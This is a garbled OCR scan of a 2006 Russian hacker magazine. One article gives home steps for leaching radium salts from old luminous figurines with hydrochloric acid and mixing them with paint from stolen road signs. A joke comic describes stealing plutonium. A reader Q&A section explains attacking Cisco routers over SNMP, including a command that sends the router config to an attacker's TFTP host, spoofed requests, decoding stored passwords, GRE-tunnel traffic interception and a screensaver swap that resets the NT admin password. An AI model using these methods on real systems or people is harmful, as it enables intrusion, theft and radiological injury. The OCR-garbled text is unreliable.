ненормальные прилагательные сбивают с толку даже самых стой- 
ких. Но это все мелочи ! Планк добился уважения только в предпен- 
сионном возрасте, когда слава в общем-то уже не радует. Супруги 
Кюри наверняка стонали от многочисленных счетов от врача, ко- 
торый хоть и не знал ничего об облучении, но деньги, несомненно, 
любил. Известный каждому школьнику Резерфорд успел воспи- 
тать более полусотни учеников, но где теперь они? Их имена знают 
только посвященные. Тебя это может впечатлить, а вот меня — нет. 
Проблема всех этих, несомненно, гениальных ученых заключает- 
ся в полном непонимании основ менеджмента. Какая может быть 
польза от тяжелой формы лейкемии или других последствий облу- 
чения? В лучшем случае чисто медицинская и иногда политико-де- 
мографическая, но это уже входит в область преступлений против 
человечества. 

Нас же интересует практическое применение радиации. На са- 
мом деле радиация страшна только в газетных заметках или на тер- 
ритории ядерных полигонов, где она заботя и во культивируется. Но 
студентов, будущих талантливых членов общества, совершенно 
бессовестно заставляют с ней сталкиваться. 

Например, вторая или третья классическая лабораторная ра- 
бота для первокурсников на всех факультетах ФизТеха связана 
с подсчитыванием «космических» аірйа-частиц. Дикость этих 
мероприятий можно описать парой слов: на протяжении 2-3-х 
часов проведения этой экзекуции лабораторный зал оглашается 
звуками «мяу», «гав» и «ку-ка-ре-ку!». Но радиация здесь ни при 



ИНСТРУКЦИЯ 
ПО КРАЖЕ 
ОРУЖЕЙНОГО 
ПЛУТОНИЯ 

Первым делом 
нужно угнать 
со стройки 
экскаватор, 
подъехать поближе 
к АЭС и вырыть подкоп... 
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І После того, как ты пролез через подкоп, 
осмотрись. Палиться еще не время. 



ІІЭтот малый у компа 
рулит всем процессом 
на станции. Нервировать 
его не нужно: чуть что, 

кабзец. 



Лаборатония. Плутоний тут. 
Обрати внимание: треснула 



и всем вокруг 



ТмУІ |колба. Надо отсюда валить. 



Парни тюнят свой Корвет 68 
года. Поставили атомный 
двигатель и теперь будут 
всех рвать на стритрейсинге 



ІПугать светил науки не следует. 
Если вежливо объяснить им цель 
твоего визита, они дадут тебе 
пару килограммов плутония и 
десяток советов. 



Подвезли колбочки 
для опытов. 

Плутония там нет, 
но и бить их не стоит. 
Когда сопрешь 
плутоний, угонишь 
грузовик и свалишь 
на нем. 



Ребята обсуждают выходные: 

« Ну и на жрались мы вчера! 

Всю лабораторию заблевали. 
Зато теперь кактусы лучше растут > 



Юный Боб Марли 

с другом играют 
на гитаре, машут 
дорожным знаком и 
надевают фуражку 
ВМФ. Можешь ду- 
нуть вместе с ними. 



Хрен на вышке тебя моменталь- 
но заметит. Чтобы отвлечь его, 
нужно послать свою подругу 
на другую сторону станции 
танцевать стриптиз. 



Нет, приятель, 
тебе не сюда. 

Это всего лишь 
отработанные отходы, 
их привезли 
для переработки. 

Зато если поджечь 
эти бочки, 
рванет не по-детски. 



Забор проще 
всего преодолеть, 
прорезав в нем дырку 
при помощи кусачек 



Чувак репетирует парад 
в честь дня рождения Саддама 
Хусейна. Не отвлекай его. 



Если тебя заметят менты, поп- 
робуй изобразить местного: 
вращай глазами и улыбайса. 
Если не получится, то придется 
их вырубить. 



Вертолет увозит боеголовки 
для иранских исламистов. 
"^Пилот тебя не попалит: они 
с другом раскурили бамбук. 



Парень в очках 

читает умную книгу. 
Хочет обогатить 













ИМПЛАНТ 



чем — уставшие студенты быстро делились на пары, и при отлове 
очередной заблудшей частицы первый студент тут же озвучивал 
это событие мяуканьем или кукареканьем, чтобы второй мог поста- 
вить очередную галочку, не отрываясь от кроссворда. Данные со- 
хранены с точностью до долей секунды, преподаватель рад четко 
рассчитанной работе, а студент после эйфории от первой сданной 
лабы начинает ломать голову: а зачем это было нужно?! 

Так что никакой пользы от этой процедуры нет. Как студент, 
я понял, что посещение лабораторных работ чревато скукой, а 
непосещение — проблемами с деканатом, но все же техничес- 
кие возможности лаборатории щекотали нервы. Попытка уст- 
роиться охранником на полставки увенчалась успехом и дала 
возможность поковыряться в технике 70-х годов. Первое впе- 



Оба варианта обеспечили меня одним из неопасных изотопов ра- 
дия, который довольно щедро добавляли в подобную бижутерию. 
Отличить радиоактивную безделушку от люминесцентной можно и 
без счетчика Г ейгера: достаточно поместить испытуемый предмет 
в темное место на ночь. Настоящий люминофор, который содер- 
жится в более современных поделках, перестает светиться через 
3 — 7 часов, после чего его необходимо «подзаряжать» на свету. 
Никакой радиацией тут и не пахнет. Испытывать панический ужас 
перед излучением не стоит, ведь это альфа-радиация, к тому же 
настолько слабая, что она полностью экранируется стеклянной 
дверцей того же серванта или крышкой на часах. 

Будем считать, что немного радиации мы добыли, не преступая 
закон. Теперь перейдем ко второй фазе, возможно, чреватой адми- 




Самый крутой способ вырубить охранника — 
шмальнуть из М-1 б. Есть еще вариант принести 
бочку с отходами и стрельнуть туда — рванет 
крепко. Нужно только вовремя свалить, чтобы 
не пораниться. 

ЖЖ ЖЖ ЖЖ жж жж жжжж ж жж ж ж ж жж жж_ 

о □ 



чатление — непревзойденный шедевр гигантизма! Второе — а 
что с этим делать? Третье — а почему это еще и так дорого и 
секретно? 

Однако один раз мне удалось добиться если не настоящего Джа, 
то хотя бы некоторого просветления: альфа-частицы хоть и негде 
приложить в быту в изначальном виде, но они все же являются ис- 
точником энергии, пусть и очень малой. Немного ночной возни со 
страшилами-агрегатами без преподавателя над душой подтверди- 
ли жизнеспособность некоторых моих глупостей. 

Джа 

В первую очередь для нашего полурелигиозного экстаза пот- 
ребуется источник радиации. В нашем случае самый простой 
способ — не попасться на краже плутония, а обойтись старыми 
стеклянными «флуоресцентными» фигурками, которые очень 
часто оккупируют бабушкины серванты. Еще очень помогают ко- 
мандирские часы старой закалки со светящимся циферблатом. 



нистративной ответственностью. Необходимо добыть люминофор. 
Бабушкины серванты с более современными сувенирами тут вряд 
ли помогут, так как нам нужно много рабочего вещества (Расколь- 
ников — не наш герой) — в сотни раз больше, чем можно добыть из 
светящихся фигурок. Придется воровать дорожные знаки! 

Обычно дорожные указатели покрывают белой «отражающей» 
краской, которая на самом деле является коротковременным люми- 
нофором, а не «отражателем». Принцип эффекта люминесценции 
довольно прост: кванты света или излучения поглощаются вещест- 
вом, точнее световая энергия поднимает электроны на более высо- 
коэнергетические орбитали атомов (я намеренноупрощаю описание 
процесса, так как он нас не слишком интересует). В подавляющем 
большинстве случаев энергии квантов света не хватает для «подкач- 
ки» атомарных электронов, к тому же не каждый атом имеет разные 
уровни орбиталей с небольшой разницей в энергии. Даже если это 
знаменательное событие произошло наперекор всему, то эта неус- 
тойчивая позиция тут же разрушается — электрон возвращается на 
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внутреннюю орбиту, а высвободившаяся энергия излучается в виде 
кванта света. Столько всего произошло, а результат нулевой... 

В свою очередь люминофоры состоят из веществ с подходящи- 
ми нам свойствами, то есть могут удерживать электрон на высшей 
орбите некоторое время, что позволяет им накапливать световую 
энергию, а потом постепенно излучать ее, светясь самостоятельно. 
Чтобы добиться долгого и яркого свечения, необходимо готовить 
люминофор с учетом определенных жестких условий. Например, 
его можно приготовить из оксида цинка с чистотой максимум в 0,01 
процента примесей, а легирующие добавки в виде солей серебра, 
марганцаилизолотадолжныдобавлятьсявточноотмеренныхмикро- 
скопических объемах, причем даже точное соблюдение пропорций 
и чистоты не гарантирует приемлемый результат, так как подготов- 



с большей длиной волны, чем «исходный» свет. Нам нужноболее 
жесткое излучение, именно поэтому придется грабить серванты 
ближайших родственников. Радий выдает, конечно, не кванто- 
вую датта-радиацию, но излучаемые тяжелые альфа-частицы 
при столкновении с довольно частыми примесями тяжелых ато- 
мов в люминофоре выделяют достаточно энергии. Если смешать 
наш недолюминофор и радиевую соль, то мы получим источник 
света с внутренней подкачкой! Радий «светит» десятилетиями, 
так что наш люминофор будет светиться в видимом диапазоне 
столько же. Более того, представь, сколько бы потребовалось 
энергии для калорифера в качестве подкачки, если бы мы вос- 
пользовались инфракрасным спектром? Но этот способ абсо- 
лютно нерационален! 




Пугать ученых — кислая маза . Маска и факел 
тебе нужны только для конспирации. Приветливо 
помаши факелом и скажи, что тебе нужен плу- 
тоний для изготовления монитора. Тебе с удо- 
вольствием отсыпят пару килограммов. 



О 
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ленную смесь нужно выдержать в строго заданном температурном 
диапазоне в 700 — 750 градусов в течение нескольких часов! 

Как видишь, кристально честный способ производства в до- 
машних условиях нереализуем, поэтому мы и возвращаемся к 
дорожным знакам. Люминофорная краска, которой прорисо- 
вывают стрелки и буквы, является «короткоживущей», а потому 
недорогой. Время послесвечения измеряется сотыми долями 
секунды, зато все мы видим, какярко этакраска «отражает» свет 
фар ночью. Однако тот, кто хоть мельком знаком с принципом 
работы подкачки в самых простых лазерах, легко поймет, куда 
я сейчас клоню. Увеличить время послесвечения люминофора 
очень трудно, но ведь пока фары автомобиля освещают знак, 
отраженный свет радует взор автомобилиста. Заменим посто- 
янное видимое излучение фар невидимым диапазоном, который 
будет постоянно подзаряжать наш люминофор. Сразу же на ум 
приходит тепловое, то есть инфракрасное излучение, но люми- 
нофоры имеют одно неприятное свойство: они выдаютсвечение 



Ближе к реальности 

Краску с дорожного указателя нужно аккуратно снять шкуркой-ну- 
левкой, стараясь не соскрести металлическую основу знака. Чем 
меньше будет примесей, тем лучше. Светящуюся фигурку с радием 
лучше подобрать пластмассовую, но стеклянная тоже сойдет. Из 
пластиковой основы можно легко вытянуть соли радия любой кис- 
лотой (хоть соляной, или даже уксусом), в то время как со стеклом 
нужно будет повозиться: мало того, что придется толочь стекло до 
состояния пыли, так еще и оксид кремния обязательно попадет в 
результирующую смесь в виде примеси и будет задерживать боль- 
шую часть радиации. Нам это ни к чему. Пластик, например, легко 
можно натереть даже на терке. Если в наличии имеются только 
стеклянные фигурки, то можно попытаться найти плавиковую или 
ортофосфорную кислоты. Первая достаточно быстро «разъеда- 
ет» стекло, и мы в результате получаем фторид радия. Ортофос- 
форная кислота «разъедает» стекло очень медленно. Проблема 
заключается в том, что плавиковая кислота — весьма агрессив- 
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Прячемся за всеми мыслимыми средствами индивидуальной 
защиты. Руки защищать необязательно, так как раствор 
соляной кислоты им повредить серьезно не может (вообще, 
10% НС1 содержится даже в желудке человека) , но глаза 
защитить необходимо . В моем случае фигурка содержала 
металлические вставки, поэтому реакция была бурной. 

. I 1 / 




и ч*в 




Свечение заметно даже при электрическом освещении, 
хотя еще недостаточно яркое. Это один из промежу- 
точных опытов, когда в парафин не была добавлена 
сахарная пудра . 



г г 



ная вещь, к тому же придется использовать пластиковую посуду, 
да и вообще, хорошо бы иметь практический опыт хотя бы в ана- 
литической химии, ведь рассчитывать и даже титровать придется 
много. Ортофосфорная кислота не так опасна, поэтому не требует 
особых знаний, но, как и плавиковую, ее проблематично достать. 

С пластиковой фигуркой процедура попроще: достаточно ее 
растолочь, натереть в стружку или в пыл ь (в зависимости от пласти- 
ка), после чего залить соляной кислотой. Весьма злой 30% раствор 
НСІ за несколько минут вытянет хлорид радия. Соляная кислота не 
является стратегическим веществом, поэтому ее легко можно най- 
ти в хозяйственных магазинах. Главное ее преимущество заклю- 
чается в том, что кислота представляет собою раствор газа НСІ 
в воде. Полученный после реакции раствор достаточно медленно 
выпарить — вода и возможные остатки НСІ_ просто исчезнут. Но не- 
обходимо соблюсти осторожность с парами НСІ_, так как они очень 
едкие и не намного отличаются по физиологическому действию от 
чистого хлора, во время Первой мировой войны зарекомендовав- 
шего себя как неплохое боевое отравляющее вещество. Проще 
всего провести процедуру выпаривания на открытом воздухе. 
Стоит отойти на пару метров, пока вся жидкость не выкипит, так 
как запах выделяющегося НСІ быстро испортит настроение. Его 
концентрация неопасна, но несколько очень неприятных минут для 
слишком любопытных будут обеспечены. Я же использовал хими- 
ческий респиратор и защитные очки при открытых окнах. Холодно, 
но мне не привыкать. 

Полученную солевую выпарку растворяем в теплой воде и 
смешиваем со скобленной краской-люминофором. На дне со- 
берется нерастворимый осадок, который нужнохорошенько пе- 
реболтать, чтобы раствор с солями попал даже в самые мелкие 
поры осадка люминофора. После этого раствор снова выпари- 
ваем, причем теперь особых мер безопасности не потребуется. 
Полученную белую массу крошим, растирая смесь в пыль. Эко- 
номить время на этой процедуре не стоит: от нее будет зависеть 
равномерность свечения. 

Теперь можно позаботиться о вяжущем веществе. Обычно при- 
меняют парафин, но, после того как ты размешаешь нашу смесь в 
расплавленном парафине, попробуй размазать полученный бри- 



кет по максимально большой поверхности — площадь покрытия 
получится минимальной. Для равномерного покрытия светящимся 
составом больших поверхностей удобнее превратить наш поро- 
шок в краску, для чего его нужно безжалостно высыпать в банку с 
белой гуашью (белый цвет краски достигается при помощи оксида 
цинка, а ведь это основа люминофоров! ). 

Теперь можно творить. Любой белый лист ватмана с пористой 
структурой нужно покрыть парой слоев нашей краски или нате- 
реть куском парафина с люминофором, собрать пару десятков 
таких листов и обклеить ими потолок. Свечения этой конструкции 
должно хватить тебе на 20 — 30 лет, так что о ночных кошмарах и 
монстрахвтемныхуглахможнозабыть. Интенсивность излучения 
очень мала: как в видимом диапазоне, так и с точки зрения радиа- 
ционной безопасности. 

Днем покрашенная люминофором бумага будет выглядеть как 
обычный, причем очень аккуратный и добротный мелованный по- 
толок, а свечение будет заметно только в темное время суток, хотя 
его будет достаточно, чтобы легко распознавать предметы в комна- 
те и даже читать. Счетчик Г ейгера перестает регистрировать хоть 
что-нибудь уже на расстоянии полуметра от потолка, но особенно 
мнительные граждане могут прикрыть потолочную бумагу слоем 
прозрачного пластика. Так что ты быстро привыкнешь к зеленому 
свечению в стиле злых алиенов с Марса. 

Антиглобалистская визуализация 

Размалевать потолок зелеными разводами — невелика заслуга. 
Этим развлекаются толпы бездельников школьного возраста, 
иногда даже демонстрируя некоторый художественный вкус, не- 
смотря на заборность своей графики. Но я не буду отвлекаться на 
банальную мазню и попытаюсь в очередной раз разоблачить непо- 
мерную жадность и лень производителей компьютерной техники. 

На этот раз мы убедимся, что траты японцев на разработку 
тонких гибких жидкокристаллических панелей являются надува- 
тельством и раздуванием фондов. После успешного завершения 
опытов я из любопытства пошуровал в старом архиве пресс-ма- 
териалов, которые мне присылали из лаборатории Токийского 
технического университета. Исследователи получали от отечес- 



040 



ХАКЕР 05 /89/ 06 








депорт мастер 

Единая счшмнпая с*цхба: |4Е5) 777-777-1 

Для реокми І*Ф: 5‘в00 -7Т7-Л7-1 
{здоицс бтѵйіиыі^ 

Окгйпуйм: 4Э&} 755-ѲТѲг 



СПОРТА АН ДИЯ 

гі ■ і ь 1««#в І ір И щ шші лѣшгФШ Ш і>ііі іа ■■ ■ 



ЙЭР 






ИМПЛАНТ 




Чудо сэра Синклера отличается простотой и легкостью 
программирования. Управление самодельной символь- 
ной таблицей, пайка выводов и подключение к шине 
данных — два дня. На «мониторе» отлично различаются 
надписи «ТЕСТ» и «280». 




Плавим парафин и доводим до кипения, после чего 
сбавляем огонь . На медленном огне примеси воды ис- 
парятся, а «мусор» либо осядет, либо всплывет. Ох- 
лаждаем и срезаем верхнюю и нижнюю части застывшей 
формы с примесями. Чем больше раз будет повторена 
эта процедура (которую можно сравнить с «зонной 
плавкой») , тем чище и равномернее будет свечение. 



твенных и корейских корпораций гранты на разработку гибких 
ЖК-экранов — к 2002-му году общая сумма достигла астрономи- 
ческой цифры в 25 млрд, иен, что составляет около 220-ти млн. 
долларов США. Судя по всему, каких-то серьезных сдвигов за 
последние три года не наблюдается. Наверняка еще десяток 
миллиардов японских рублей было потрачено на бесполезные 
изыскания, когда мне достаточно было двух недель и суммы, эк- 
вивалентной кружке хорошего пива. 

Совершенно случайно на глаза мне попалась небольшая ста- 
тейкапросозданиеэкономическихпромышленныхосветительных 
приборов. В этот класс входят не только разнообразные лампы, но 
и индикаторы, которые должны работать в агрессивной среде или 
просто неудобных для обслуживания местах. В частности, в статье 
мельком упомянается, что в аэропорту Хитроу начали испытывать 
ночную разметку на базе краски, которая светится при наличии 
разницы потенциалов. Простота и изящество идеи отлично пере- 
секаются с моей светящейся краской. В статье говорилось, что 
основа для разметки тоже представляла собой достаточно прос- 
той люминофор с очень небольшой примесью растворимых солей 
слаборадиоактивных металлов. В качестве связующего вещества 
использовался прозрачный пластик с гелевой основой внутри, 
роль которого в моем опыте выполняет парафин. 

Несложно догадаться, что растворимость соли и гель требуют- 
ся для того, чтобы небольшая диссоциация позволяла обеспечить 
слабый ток при наличии разности потенциалов. В моем случае за- 
дача облегчается тем , что хлориды большинства металлов сами по 
себе гигроскопичны, так что, даже несмотря на парафин, диссо- 
циация будет иметь место (обычный свечной парафин не являет- 
ся смесью чистых предельных парафинов, и содержит не только 
влагу, но и кучу примесей в виде альдегидов или хотя бы углево- 
дородов с двойными связями — все это позволяет удерживать в 
веществе до полупроцента влаги). 

Первый же опыт с куском ватмана, пальчиковой батарейкой и 
парой проводов показал, что яркость свечения немного улучши- 
лась. Чтобы увеличить количество влаги в своей «краске», я до- 
бавил немного поваренной соли и сахара в расплав парафина. 
Хлориднатрияувеличитпроводимостьзасчетувеличенияионов,а 



сахар отличается потрясающей гигроскопичностью: попробуй ос- 
тавить сахарницу открытой — кристаллы слипнутся, а через неде- 
лю могут вообще превратиться в стеклообразную патоку. Теперь 
свечение заметно даже при электрическом освещении ! 

Дальше уже дело техники. Разлиновываю ватман, капаю в клет- 
ки по капле парафина с люминофором, подвожу к каждой пару 
проводов по принципу светодиодных панелей, а затем подвожу 
жгут выводов к простейшему контроллеру. Большинство конт- 
роллеров используют рабочее напряжение в пределах от 1 ,5 до 
5-ти вольт, чего за глаза хватает нашему детищу. В результате по- 
лучаем монитор-индикатор с копеечным разрешением, который 
можно мять, крутить, запитывать прямо от контроллера и собирать 
за пару часов в полевых условиях. Пористость ватмана позволяет 
провести некоторые косметические изменения. Например, я за- 
капывал краску в клетки, в теплой духовке, чтобы парафин быстро 
пропитал ватман насквозь: это позволило подвести провода к од- 
ной стороне листа, а наблюдать свечение — с другой. Маленькая 
косметическая правка позволила сделать индикатор. 

Единственным серьезным недостатком можно считать только мо- 
нохромность, хотя еще совсем недавно монохромные Раіт'ы были 
популярны. Сложность создания цветных панелей заключается в 
том, что придется повозиться с контроллерами и их программирова- 
нием (потребуется по одному на каждый из компонентов Я, О и В), а 
также поискать легирующие примеси, которые дадут необходимые 
синий и красный оттенки свечения. Например, найти соли кобальта, 
кадмия или осмия в нашем насквозь антитеррористическом мире 
стало в десятки раз сложнее, чем каких-то пять лет назад. 

Конец — делу венец 

Чтобы окончательно довести идею до абсурда, я использовал в ка- 
честве контроллера легендарное чудовище 280, для которого не 
паял контроллеры только ленивый. Простое программирование, 
огромное количество схем и возможность делать отводы прямо 
от шины данных позволяют с легкостью собрать «моноблок». Как 
видите, хоть шедевра не получилось, но теперь я могу чувствовать 
себя круче создателя первого Арріе: я не только сам спаял «Синк- 
лер», но и собрал к нему монитор! т 
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Плоская клавиатура І_ихеМа*е ЗсгоІІ является воплощением стиля «современность, 
простота и удобство». Мягко нажимающиеся клавиши с тактильной отдачей позволяют 
с удобством пользоваться этой клавиатурой в повседневной работе. 

Клавиатура І_ихеМа*е ЗсгоІІ имеет бесшумные и чувствительные плоские клавиши, 
12 мультимедийных и Интернет клавиш быстрого доступа. К тому же уменьшенный размер 
и подставка для хранения клавиатуры І_ихеМаІе ЗсгоІІ делает ее идеальным выбором 
для пользователей с небольшим рабочим местом. Колесо прокрутки под левой рукой 
облегчает работу с текстами и позволяет реже переносить руку на мышь. 



ѵѵѵѵѵѵ.депіиз.ги 



В МАГАЗИНАХ 




ЕІ.ЕСТЮІ\|ІС5 



КОМПЬЮТЕРЫ 
КОМПЛЕКТУЮЩИЕ 
ПЕРИФЕРИЯ 
БЫТОВАЯ ТЕХНИКА 
ОРГТЕХНИКА 
АУДИО-ВИДЕО 
МОБИЛЬНАЯ СВЯЗЬ 
НІ-ГІ 



Москва 

ѵѵѵѵѵѵ. иіігасотр.ги ѵѵѵѵѵѵ. ІІІ_ТРІА-опІіпе.ги 
(495) 775-7566 
м. Отрадное Юрловский проезд, д. 13 
м. Коломенская ул. Коломенская, д. 17 

Санкт-Петербург 

зрЬ. иіігасотр.ги зрЬ.ІЛТРА-опІіпе.ги 
(812) 336-3777 

м. Кировский завод ул. Возрождения, д.20А 

Интернет-магазин 

с доставкой по территории РФ 
ѵѵѵѵѵѵ. II І_ТР А- Пед і о пз . ги 



Интернет-портал 

для корпоративных клиентов: 

ѵѵѵѵѵѵ. II ЬТВА-согр.ги 

1Л.ТВА СІиЬ: 

программа поощрения постоянных клиентов 
сІиЬ. иіігасотр.ги 

Для оптовых клиентов: 

ѵѵѵѵѵѵ. сіеаіегз. иіігасотр.ги 
(495) 790-7535 
сІеаІегз@иІ1гасотр.ги 



Товар сертифицирован 




НАСК-РАѲ 



ЮТ.ѴѴОІ.Р 

/ НАСКРАО@РЕАІ_. ХАКЕР. РУ / 



Будь конкретным и задавай конкретные вопросы! Старайся 
оформить свою проблему максимально детально перед посылкой 
в Наск-РАО. Только так я смогу действительно помочь тебе отве- 
том, указать на возможные ошибки. Остерегайся общих вопросов 
«Как взломать Интернет?», ты лишь потратишь мой и свой поч- 
товый трафик. Трясти из меня фришки (инет, шеллы, карты) — 
не стоит, я сам живу на гуманитарную помощь! 
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(^: Каким образом можно изменить информацию, передаваемую в 
НТТР-заголовках, такую как название браузера, Х-Бопѵагсіесі-Бог и т.п. 

А: Есть чем, было бы куда... Имея концепт заразы, портирование под 
определенную ОС остается вопросом времени. В последнее время 
развернулась зараза СМЕ-4, которая распространяется по іСЬаІ'у. 
являясь концептом виря І_еар. Фишка работает по принципу социаль- 
ного инжинеринга, но не уязвимости самой ОС. Распространяется 
под видом скринсейвера и в оригинальной версии не представляет 
угрозы. Работа была выпущена как пример слабости в безопаснос- 
ти системы. Настоящее распространение окажется успешным лишь 
после запуска из-под аккаунта администратора. Другой ^ѵа-червь, 
ОЗХ.Іпціапа.А, был представлен на суд публике для того, чтобы пока- 
зать пример использования ВІиеТооШ Оігесіогу-уязвимости, которая 
была объявлена и успешно запатчена в июне прошлого года. Третья, 
наиболее выдающаяся уязвимость, была отражена червем, который 
стал доказательством возможности подобного заражения, но не был 
распространен в массовом порядке. Дыра, эксплуатируемая образ- 
цом, позволяет запускать исполняемые файлы из открытого архива 
без ведома юзера. 

<^): Каким софтом можно поискать в сети устройства, поддерживаю- 
щие управление через 8шпр? 

А: Неплохой утилитой является зпзсап ( ѵѵѵѵѵѵТоипсІзіопе.сот Т которая 
может быстро и точно идентифицировать ЗІММР-устройства в сети. 
Она позволяет просканировать диапазон адресов на наличие откры- 
тых портов и подобрать строки доступа, которые можно предвари- 
тельно забить в файл. В отчете утилита выводит адреса найденных 
устройств, строку доступа и информацию об устройстве. Следующей 
утилитой, которую можно использовать, является ІР Ыеіѵѵогк Вгоѵѵзег 
( ѵѵѵѵѵѵ.зоІагѵѵіпсІз.пеЛ . В отличие от зпзсап, эта программа предостав- 
ляет больше возможностей и не ограничивается только сканировани- 
ем сети. С помощью этой утилиты можно просмотреть или изменить 
настройки найденных устройств. Под ипіх можно использовать пакет 
ЫЕТ-8ІММР (ранее известный как ІІСО-8ІММР), который содержит раз- 
личные средства для работы с протоколом зптр, включая расширя- 
емый агент, библиотеку ЗІХІМР, средства для запроса или установки 
информации от агентов ЗІХІМР, средства генерации и обработки сиг- 
налов ЗІХІМР, версию ипіх-команды 'пеІзІаТ, использующую протокол 
ЗІХІМР, а также средство просмотра управляющей информации для Тк/ 
регі. Также можно воспользоваться утилитой Сізсо ІогсН, написанной 
на регі, и предназначенной для массового сканирования, обнаруже- 
ния и эксплуатации Сізсо-маршрутизаторов. Программа использует 
несколько методов снятия отпечатков у прикладных служб. Сізсо быс- 
тро обнаруживает хосты с запущенными службами іеіпеі, ззб, ѴѴеЬ, 
ІХІТР и ЗІХІМР и выполняет нападение по словарю против обнаружен- 
ных служб. Скачать Сізсо іогсИ можно по адресу: ІпНр://аіТіопі.сот . 

<^): Итак, я нашел в Сети маршрутизатор, поддерживающий управле- 
ние через зптр. Что нужно делать дальше? 

А: Если найденное устройство поддерживает базу данных МІВ уста- 
ревшего формата, то через строки доступа, обеспечивающие чтение/ 
запись (геаб/ѵѵгііе соттипііу), можно попытаться получить конфигу- 
рационный файл устройства с использованием Шр. Для получения 
файла конфига можно воспользоваться описанной выше утилитой ІР 
ІХІеІѵѵогк Вгоѵѵзег. Чтобы определить, поддерживает ли устройство базы 
старого формата (если мы имеем дело с маршрутизатором Сізсо), 
можно зайти по адресу: Йр://Йр. сізсо. сот/риЬ/тіЬз/зирроіІІізІз/ . найти 
там нужное устройство и посмотреть, поддерживается ли устройством 
база 0І-0-СІЗС0-8Ѵ8-МІВ. Под ипіх конфиг кошки можно получить, 
воспользовавшись следующей командой: 

зптрзеі 1 1 .22.33.44 ргіѵаіе 1 .3.6. 1.4.1 .9.2.1 .55.66.66.66.66 з сопіід.іііе, 
где 1 1 .22.33.44 — ІР-адрес маршрутизатора, ргіѵаіе — строка доступа 
для чтения и записи и 66.66.66.66 — ІР-адрес компьютера, на кото- 
ром запущен сервис Йрі. После получения конфигурационного файла 
можно будет найти в нем пароль для доступа к устройству. Так как про- 
токол зптр основан на ІЮР и является протоколом без установления 
соединения, то это делает его уязвимым к атаке подмены ІР-адреса, 
и атакующий может получить конфигурационный файл устройства, 
используя зптр-запрос ЗЕТ с поддельным ІР-адресом. Таким обра- 
зом, он может обходить правила фильтрации ЗІХІМР-доступа и обес- 
печить свою скрытность. 

Про атаку на Сізсо через ЗІХІМР с подделкой ІР можно почитать на 
ѵѵѵѵѵѵ.зесигі1ѵІаЬ.ги/апаІѵ1ісз/241 391 .рбр . 

Что за атака на №Г с подменой файла скринсейвера? 

А: Данная тема успешно эксплуатировалась в контексте І\ІТ 4.0 и до 
неизвестного времени была успешно применима на неизвестных бил- 



дах І\ІТ 5.0. Нужно было установить вторую І\ІТ на разбираемом компе, 
в настройках поменять загрузочную директорию на оригинальную, 
чтобы потом нашелся и был удален файл заставки входа во взламы- 
ваемую систему Іодоп.зсг. На его место записывался стсі.ехе, буду- 
чи переименованным во все тот же Іодоп.зсг. В большинстве систем 
Іодоп.зсг запускается после 15-ти минут неактивности при входе в сис- 
тему. Старая и неразумная система запускала консоль стсі.ехе , впус- 
кала тебя в свое чрево для беспредельного контроля. Любители ОІІГя 
могли с успехом подменить заставку файлом ехріогег.ехе. При работе 
с стсі.ехе обыкновенно набивалась строчка «пеі изег абтіпізігаіог 
123456», которая меняла пароль администратора на прозаический 
123456. 

Я нашел пароль СІ8со в конфигурационном файле, но он в каком- 
то непонятном формате. Как его можно расшифровать? 

А: В конфигурационном файле можно найти два типа паролей: пароль 
режима епаЫе и пароль виртуального терминала (іеіпеі). Для режи- 
ма епаЫе может использоваться как зашифрованный пароль епаЫе 
зесгеі, так и простой пароль епаЫе раззѵѵогб. ЕпаЫе шифруется с 
помощью алгоритма тсІ5, который обеспечивает большую надеж- 
ность, а пароли на виртуальный терминал и простой пароль епаЫе 
шифруются встроенным алгоритмом Сізсо. 

Встроенный формат шифрования Сізсо основан на использовании опе- 
рации хог и постоянного инициализирующего значения. Шифруемые 
пароли могут иметь до 11 -ти алфавитно-цифровых символов разного 
регистра. Первые два байта пароля выбираются случайным образом 
из диапазона 0x0 до ОхР, а оставшиеся представляют собой стро- 
ку, полученную путем объединения с помощью хог-пароля и задан- 
ного блока символов бзІб;к!оА,.іуеѵѵгкШКОНЗІІВ. Расшифровать его 
можно с помощью ряда утилит, например ИДр://раске1з1огтзесигі1ѵ.пІ/ 
сізсо/сізсосгаск.с или ЬазИ-скрипта ННрТ/раскеІзІогтзесигіІѵ.пІ/ЦІХІІХ/ 
пеісаі/сізсорѵѵ . Более подробно про расшифровку можно почитать 
по адресу: ИДр://раске1з1огтзесигі1ѵ.пІ/сізсо/сізсо.бесгѵрЩесИ.іп1о. 
Ьѵ.тисІае.Щ 

Я захватил управление над маршрутизатором. Как теперь можно 
поснифать данные, передаваемые через него? 

А: Метод перехвата трафика, проходящего через маршрутизатор, 
заключается в создании СРЕ-туннеля между захваченным и нахо- 
дящимся под управлением злоумышленника. СРЕ (Сепегіс Роиііпд 
Епсарзиіаііоп) — протокол туннелирования, разработанный для инкап- 
суляции произвольных типов пакетов сетевого уровня внутри пакета 
сетевого уровня. Маршрутизация настраивается таким образом, чтобы 
переадресовывать входящий и исходящий трафик на злоумышленника 
через (ЗРЕ-туннель. При этом трафик обрабатывается «заложником» 
злоумышленника и возвращается на основной маршрутизатор для 
заключительной доставки. Атакующий же получает туннелированные 
данные, инкапсулированные в ОРЕ-пакете, а декодированные данные 
пересылает на снифер атакующего. После того как компьютер атаку- 
ющего с запущенным снифером перехватит и передаст обратно полу- 
ченные данные, его маршрутизатор перенаправляет данные обратно 
на атакуемый. Такой метод перехвата трафика практически незаметен 
конечному пользователю, так как утилиты трассировки маршрутов не 
будут показывать дополнительных хопов, созданных (ЗРЕ-переадреса- 
цией. Более подробно про описанный метод с примерами настройки 
маршрутизаторов для создания (ЗРЕ-туннеля можно почитать по сле- 
дующим ссылкам: 

ѵѵѵѵѵѵ.зесип1ѵ-рго1осоІз.сот/ѵѵІіі1ерарегз/гои1іпа/ОРЕ зпііііпа.бос 
ѵѵѵѵѵѵ.зесигіЫосиз.сот/іпІосиз/1847 

(^: Что делать, если моя сетка забанена ІКС- сетью? 

А: Первый вариант определенно связан с предыдущим пунктом — тебе 
придется пользоваться другой сетью для доступа. Скажем, запуская 
ИРЦ-клиент с удаленного сервера вроде ігсіі/ЬіісИх или установив там 
комфортабельный ВЫС. Второй вариант прозрачнее, но занимает 
больше времени: нужно связаться с администрацией Сети и объяс- 
нить, что ты не баран. Большинство сетей приводят их аЬизе-контакт 
во время выброса тебя из сети, просят отправить все данные к-Ііпе 
сообщения и описать суть твоей проблемы. Практика показывает, что 
до 80% подобных писем остаются без ответа. Полезнее оказывает- 
ся личное общение с администрацией Сети онлайн. Так, на ОАБпеІ’е 
